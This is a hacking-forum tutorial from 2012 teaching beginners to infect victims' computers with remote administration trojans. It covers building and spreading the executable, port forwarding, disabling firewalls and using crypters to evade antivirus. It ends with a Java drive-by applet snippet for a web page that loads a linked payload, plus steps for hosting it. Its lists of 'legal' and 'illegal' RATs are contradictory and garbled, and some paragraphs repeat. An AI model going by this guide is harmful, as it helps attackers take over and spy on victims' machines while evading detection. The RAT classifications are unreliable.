☆Remote Administration Tool :: Tutorial :: Beginners Guide :: 12-25-2012, 11:38 AM
#1
Remote Administration Tool Beginners Tutorial by Skiezo™
- What is a Remote Administration Tool?
- How do Remote administration Tools work?
- Port Forwarding on your Router
- What is a Crypter?
- Legal and Illegal RATs
- What is SandBoxie?
- How to use SandBoxie?
- What are Java drive-by's?
What is a Remote Administration Tool?
A RAT is the Abbreviation/Shortcut of Remote Administration Tool. It is mostly used for malicious purposes, such as controlling PC’s, stealing victims data, deleting or editing some files. You can only infect someone by sending him the Executable file you have created with your RAT, or either use a Java drive-by to make your victim activate the virus by running a Java applet.
How do Remote Administration Tools work?
A remote administration tool has a Executable file and client technology. The Executable file runs on a controlled host computer and receives commands from the client, which is installed on other remote host. A remote administration tool works in background and will hide for users. You can monitor user’s activity, manage files, install additional software, control the entire system including any present application or hardware device, modify essential system settings, turn off or restart a computer and fun abilities such as turning on Webcams/Changing wallpapers and much more.
Remote administration tools are divided into malicious and legitimate applications. Illegal RATs, also known as remote administration trojans, are analogous to Backdoors and have very similar functionality. However, they aren't viral, do not propagate by themselves and usually do not have additional destructive functions or other dangerous payload. These Malware containing files do not work on their own and must be controlled by the client.
This is how you create your Executable file on a RAT:
Remote administration tools are divided into malicious and legitimate applications. Illegal RATs, also known as remote administration trojans, are analogous to Backdoors and have very similar functionality. However, they aren't viral, do not propagate by themselves and usually do not have additional destructive functions or other dangerous payload. These Malware containing files do not work on their own and must be controlled by the client.
This is how you create your Executable file on a RAT:
- BlackShades RAT
Spoiler: - Darkcomet RAT
Spoiler: - NetWire RAT
Spoiler: - CyberGate RAT
Spoiler:
Port Forwarding on your Router
First of all you have to find your Router's IP Address information.
To view your IP address information do these two steps:- Start > Run then type CMD then press Enter.
- Than you have to type in your Command Prompt: IPconfig/all
If you see your network interface with a list of IP addresses (should not be all 0.0.0.0's addresses). If you got an IP starting with 192.168... or 10.0. That's very good! Find the Gateway IP Address. This is the router's IP address.
It may be one of the following that are appearing in your CMD. If you have no clue try one of the following:- 192.168.1.1
- 192.168.0.1
- 192.168.0.50
- 10.0.0.1
- 192.168.1.254
- admin - No Password
- No Username - admin
- admin - password
Alternatively, you can search Google with your Router Model number and there are enough people on different forums that will have the right default password that you need to use for your router.![[Image: c9f75912ca05769b848efe1575b3f532.png?1355870246]](http://gyazo.com/c9f75912ca05769b848efe1575b3f532.png?1355870246)
Whenever you're logged in on your Router, You first go to UpnP (Universal Plug & Play) and start Enabling that. For security You may disable your Firewall on your Router but also on your Windows Computer, this is to prevent your Ports being closed whenever you have Port Forwarded it for your RAT.
![[Image: 4ad066edfb72080f2d73eeb2dfc6e34b.png?1355870309]](http://gyazo.com/4ad066edfb72080f2d73eeb2dfc6e34b.png?1355870309)
Port Forwarding is the process that is needed to forward different types of Internet connections into your Network. Understand that the Router is protecting your networking by segmenting it; so it's doing its job. Port Forwarding is one way to allow traffic into your network (manually), but now most routers and devices allow UPnP. Despite some possible security risks, it has been very popular and useful in Peer-to-Peer applications like uTorrent. Port forwarding is necessary because your router is designed to automatically reject any inbound connections that you didn't initiate.
So if you want to RAT or play a Online Game you need to set your Ports First, you will be able to connect to them and conversely they need to connect to you. If you have the router toggled on a "game" mode or similar, it will create a lag in the beginning as it attempts to learn what you are doing. This isn't ideal.
You can use any Common Ports if you'd like to Port Forward for a RAT.
This can be many many ports, a Recommendation would be over 1000+
Some examples of ports here:- 2000
- 2001
- 3080
- 3081
- 1604
- 1337
For Ratting you have to make sure you use TCP+UDP as your Protocols, Because RATs use a lot of features and some of the features require UDP instead of TCP that is needed for the connections. And you also have to make sure that you'll be using the IPV4 Address of your Host computer.
Different Computer accounts will not have the same IPV4 Address!
![[Image: e96b972dcdcea5137d363c8ca422804b.png?1355870412]](http://gyazo.com/e96b972dcdcea5137d363c8ca422804b.png?1355870412)
If you do not have the same Router as that i have, Search for your Router Model Number and go to Google.com. Most of the used Routers that you need to PortForward on can be found on; http://PortForward.com. That website will provide a good Tutorial on how to Port Forward for your Router. It's noob-friendly and almost all Routers on there.
What is a Crypter?
Crypters are computer applications which are most of the time used to bypass the antivirus detection of Malwares. Crypters are been used to hide viruses, Trojans, RATS, Keyloggers and other hack tools into a new Executable file. The purpose is to bypass the detection of the same from antivirus. Crypters are basically coded in VB/C+ and other Code Programs. They just spoof the actual program behind their encryption and make antivirus don't detect the file. Most antivirus detects viruses on basis of heuristics and normal string based detection. Since we crypted the original program, The antiviruses stand lame and does not detect it as a virus.
Fully Undetectable or Undetectable:- Fully undetectable(FUD) means that your virus is not detected by any of the existing antiviruses
- Undetectable (UD) means detectable by few antiviruses of all the existing antiviruses.
A Crypter will remain FUD until you have shared it Online on the Internet. Public Crypters remains FUD up to maximum 2 to 3 days then they become Undetectable. So if you want to use Crypter for long time, You should never publish it Online on the Internet.
Stub:
A stub is a small piece of code which contains certain basic functionality which is used again and again. It is similar to package in Java or simply like header files in C. A stub basically simulates the functionality of existing codes similarly like procedures on remote machines or simply PC's. In Crypters, client side server is validated using stubs, so never delete stub file from your Crypter. Stubs adds portability to Crypter code, so that it can be used on any machine without requiring much procedures and resources on other machines.
Let me explain with small example:
Suppose you are writing a code that converts bytes to bits, so we know formula or method for converting bytes to bits will remain same and it will be independent of machine. So our stub (or method stub or procedure) will contain something like this:
Code:BEGIN
totalBits = calculateBits(inputBytes)
Compute totalBits = inputBytes * 8
END
Now what we will pass is only number of bytes to this stub. And it will return the resulting bits. Similarly, we include some common machine independent checks and functions in our stub, and in main code we only passes linkage and inputs to these stubs, which in return provides suitable results.
Most of times it happens, suppose you downloaded some Keylogger and you complain to provider its not working, only reason for that is stub.
You have 4 different Crypters:- External Stub based Crypters
- Internal or Inbuilt stub based Crypters
- Run time Crypters
- Scan time Crypters
External Stub based Crypters: Well most of you have downloaded a public Crypter by now and when you open the folder you have seen 2 things:
Client.exe & Stub.exe
These type of Crypters are called External Crypter in which the functionality of the Crypter pretty much depends on the external stub.
You delete the stub and the Crypter is useless.
Internal or Inbuilt stub based Crypters:
The Crypters that contains only one EXE file (i.e client) fall under this category. This client file has inbuilt stub in it. You can separate stub and client part here too using RCE (Reverse Code Engineering) but it is not recommended.
Run time Crypters: Run time crypters are the Crypters which remain Undetected in memory during their execution. We are looking for these type of Crypters only. These can either be External Stub based Crypters or Internal or Inbuilt stub based Crypters.
Scan time Crypters: The Crypters that crypts a server that remains Undetectable upon scanning by Antiviruses but when run in the PC gets detected by the Antivirus
Legal & Illegal RATs
There are Illegal RATs but also Legal RATs, You might be thinking what?
Illegal RATs since when are there Legal RATs? I will list here The RATs that are Legal and created by Members of Anarchy or other forums and the RATs that are Illegal and coded by Official Companies.
Illegal RATs:- Cerberus Rat
- ProRat
- Poison Ivy
- BlackShades
- Darkcomet RAT
Legal RATs:- Teamviewer
- NetWire RAT
- Darkcomet 5.4 Legacy
- Ultra VNC
- Ammyy Admin
- Mikogo
What is a Sandboxie?
Sandboxie is a Sandboxing tool used to run programs in a sandbox environment, it can be very useful when using RATS.
Many people use it to run there RAT server. SandBoxie is not just for RATS though, it can be used to test suspicious files.
Sandboxie is a great tool, however you can not use it with DarkComet if you enable the Firewall-Bypass feature.
Sandboxie also has a web-browser. I have personally not used this feature much, but it may be useful.
Sandboxie is a free program for thirty days. Then you must wait a few seconds until Sandboxing the program you want.
Sandboxie: www.sandboxie.com
How to use Sandboxie?
Sandboxie can be reached to the System notification tray area of your Taskbar.
When active, you can use the Sandboxie tray icon to hide and show the main window of Sandboxie Control, by double-clicking the icon. Or, you can right-click the icon and select the first command, which alternates between- Hide Window
- Show Window.
![[Image: StartMenuStartControlVista.png]](http://www.sandboxie.com/img/NewGui/StartMenuStartControlVista.png)
You can view this tutorial in a Sandboxed Web browser. To do that, use the Getting Started Tutorial (Web) command in the Help Menu of Sandboxie Control, and make sure you tell Sandboxie Control to run your browser sandboxed:
![[Image: OpenGettingStarted.png]](http://www.sandboxie.com/img/NewGui/OpenGettingStarted.png)
You can Download and install "Sandboxie" here. When you are done do the following:
- Right click on your server.
- Click "Run Sandboxed".
What is a Java drive-by?
A Java Drive-by is basically a popup that will ask for permission to run a java applet. When this applet is accepted and ran, a .jar file will activate a virus. This way, your virus will be run without the slave even seeing the virus. So all he has to do is accept a java popup.
The applet code must be added to your index file, and then added to your Webhost to build your website.
This is an example of an applet code, which you will need to add to your index.html:
Code:<applet name='APPLET NAME' width='1' height='1' code='java.class' archive='java.jar'><param name="funtime" value="DIRECT LINK HERE"></applet>
Java Drive-by chain:
Slave sees a popup > accepts popup > popup activates a .jar file > .jar file activates a virus.
If you have added a Applet to your index.html than you should of see a Yellow bar at the top of your Java drive-by.
A successful Java drive-by Should of look like this when running the Java Applet:![[Image: e6bb79699269ef28d17f444fa8723748.png]](http://gyazo.com/e6bb79699269ef28d17f444fa8723748.png)
![[Image: 3bc398d34c289d8799b2ce1b1790dcd2.png?1355875938]](http://gyazo.com/3bc398d34c289d8799b2ce1b1790dcd2.png?1355875938)
Free Webhosts
Paid Webhosts- http://www.inmotionhosting.com
- http://www.ipage.com/
- http://www.justhost.com/
- http://www.bluehost.com/
Now there are 2 ways of accessing your File Manager to upload your files to your Webhost.- FileZilla
- File Manager of the own Webhost.
I will be using the 1st one as that is much easier when copy + pasting the files into the File Manager
If you have loads of files that you need to upload that contain images, I suggest going for FileZilla
FileZilla can be download here
Once you have downloaded FileZilla go to your Webhost, and find something that is similar to '' Details ''
Once you have found that you have to search for FTP Transfer Details
![[Image: df9a4f6be520332ba2f5c6c0bf858ff1.png?1355929897]](http://gyazo.com/df9a4f6be520332ba2f5c6c0bf858ff1.png?1355929897)
Type the FTP details in your FileZilla
For ''Host'' you'll be using your FTP IP or your FTP Hostname, You can use both of those to enter your File Manager. For username you'll be using the FTP Username. For Password your FTP Password and for Port you'll be using your FTP Port which is most likely 21 on a lot of Webhosts.
![[Image: ed5c0a55ec9a74d583194e431f0e9d77.png?1355930127]](http://gyazo.com/ed5c0a55ec9a74d583194e431f0e9d77.png?1355930127)
This tutorial has been made by a Member of Anarchy: Skiezo™ - Start > Run then type CMD then press Enter.
![[Image: f1ac0dd865c48b0d7d47104ffbc389ce.png?1355865634]](http://gyazo.com/f1ac0dd865c48b0d7d47104ffbc389ce.png?1355865634)
![[Image: fad1ffa8ebbab8eca2fa9159fd33356f.png?1355865845]](http://gyazo.com/fad1ffa8ebbab8eca2fa9159fd33356f.png?1355865845)
![[Image: MUmT.png]](http://i.imm.io/MUmT.png)
![[Image: 63df1b1a6c5c2482543810c681f2069c.png?1355867355]](http://gyazo.com/63df1b1a6c5c2482543810c681f2069c.png?1355867355)
![[Image: 2b7df3730af0c5da77b25da656d92f47.png?1355867700]](http://gyazo.com/2b7df3730af0c5da77b25da656d92f47.png?1355867700)
![[Image: 65774daaca31abb4d249c117060e8101.png?1355867858]](http://gyazo.com/65774daaca31abb4d249c117060e8101.png?1355867858)
![[+]](https://sinister.ly/images/modern/collapse_collapsed.png)
![[Image: fSEZXPs.png]](https://i.imgur.com/fSEZXPs.png)
![[Image: mRg9m.png]](http://i.imgur.com/mRg9m.png)
![[Image: 7uhCgFS.jpg?1]](http://i.imgur.com/7uhCgFS.jpg?1)
![[Image: F4Z9Dqw.png]](https://i.imgur.com/F4Z9Dqw.png)
.png "Donator (Rank I)")
![[Image: Untitled-1_zpsc7e6c553.jpg]](http://i1328.photobucket.com/albums/w532/icyfilmer/Untitled-1_zpsc7e6c553.jpg)